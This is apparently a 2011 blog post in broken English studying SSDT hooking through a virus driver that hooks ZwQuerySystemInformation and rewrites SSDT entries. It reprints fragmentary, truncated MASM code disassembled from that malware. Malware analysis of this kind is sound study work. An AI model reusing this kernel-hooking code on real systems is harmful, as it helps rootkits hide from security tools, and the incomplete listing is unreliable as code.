Friday, October 7, 2011

Learn and study Rootkit Specials 5: kernel hook - SSDT hook(1)

 Talk about SSDT hook, before have article of <<SSDT Hook的妙用-对抗ring0 inline hook>> by 堕落天才, If do not understand basic concept, You can watch the article.

Today we through example to learn how use, The example root in article by sudami.

The virus use vbs to call driver for finish it. swk0217d's main feature:

1.Take ssdt function count
2.Take all function on ssdt function table
3.hook ZwQuerySystemInformation
4.unhook ZwQuerySystemInformation
5.In line with user given function address and index of ssdt table, Modify ssdt table

1)When hook ZwQuerySystemInformation is executed, First through ZwQuerySystemInformation to found place of ntosknrl.exe module memory load, Then through export table of ntosknrl.exe to find address of NtQuerySystemInformation. Then hook ZwQuerySystemInformation. Author of the virus main objective is prevent SSDT function to be load, So Author recover in here, Author need use this function, But afraid the function already is tampered.

2)When unhook ZwQuerySystemInformation, Recover original ssdt after Virus author use to finish the function.

.model flat,stdcall
option casemap:none

include w2k\
include w2k\

include w2k\
includelib C:\RadASM\masm32\lib\w2k\ntoskrnl.lib

unk_10B80 db  4Eh ; N
          db  0E6h  ; ?
          db  40h  ; @
          db  0BBh  ; ?
OldSSDTValueOfZwQuerySystemInformation dd 0

;              6E 74 6F 73 6B 72 6E 6C 2E 65 78 65 00 CC 6A 24 = ntoskrnl.exe,0   int3  push 24h
FunctionArray dd 736F746Eh, 6C6E726Bh, 6578652Eh,246ACC00h

; ZwQuerySystemInformation get memory load address of ntoskrnl.exe

;typedef struct _SYSTEM_MODULE_INFORMATION  // Information Class 11
;    ULONG  Reserved[2];  +0
;    PVOID  Base;         +08h
;    ULONG  Size;         +0ch
;    ULONG  Flags;        +10h
;    USHORT Index;        +14h
;    USHORT Unknown;      +16h
;    USHORT LoadCount;    +18h
;    USHORT ModuleNameOffset; +1Ah
;    CHAR   ImageName[256];   +1Ch

;                  ( IN SYSTEM_INFORMATION_CLASS SystemInformationClass,
;                    IN OUT PVOID SystemInformation,
;                    IN ULONG SystemInformationLength,
;                    OUT PULONG ReturnLength OPTIONAL );

;typedef struct _tagSysModuleList {
;    ULONG ulCount;

;s = NtQuerySystemInformation( SystemModuleInformation, pRet,
;sizeof( SYSMODULELIST ), &nRetSize );

  xor  ebx, ebx
  mov  [ebp-24h], ebx
  mov  [ebp-4], ebx
  lea  eax, [ebp-1Ch]
  push  eax          ;ReturnLength
  push  ebx          ;SystemInformationLength = 0
  lea  eax, [ebp-20h]  
  push  eax          ;SystemInformation
  push  0Bh          ;SystemModuleInformation,ergodic module
  mov  esi, ZwQuerySystemInformation
  call  esi ; ZwQuerySystemInformation ,First call to get need buffer length
  mov  [ebp-28h], eax
  cmp  eax, 0C0000004h
  push  206B6444h ;   ' kdD' lable
  push  dword ptr [ebp-1Ch] ;apply for length
  push  ebx                 ;NonPagedPool
  call  ExAllocatePoolWithTag
  mov  edi, eax
  mov  [ebp-30h], edi   ;Keep return value
  cmp  edi, ebx        ;Judge return value whether is null
  jnz  NextStep
  or  dword ptr [ebp-4], 0FFFFFFFFh
  xor  eax, eax
  jmp  ErrAllocMem
  lea  eax, [ebp-34h]          ;ReturnLength
  push  eax
  push  dword ptr [ebp-1Ch] ;SystemInformationLength
  push  edi                 ;SystemInformation
  push  0Bh                 ;SystemModuleInformation
  call  esi                 ; ZwQuerySystemInformation
  mov  [ebp-28h], eax
  cmp  eax, ebx
  jl  ReleaseMemory
  mov  eax, [edi]
  mov  [ebp-1Ch], eax  ;Keep YSTEM_MODULE_INFORMATION element count by ZwQuerySystemInformation return
  lea  esi, [edi+4] 
  mov  [ebp-2Ch], esi  ;Save firt address array by SYSTEM_MODULE_INFORMATION return 
  mov  [ebp-20h], ebx  ;Count variable zero clearing
  mov  eax, [ebp-1Ch] ;Beging for loop
  cmp  [ebp-20h], eax
  jnb  ReleaseMemory
  push  offset FunctionArray

No comments:

Post a Comment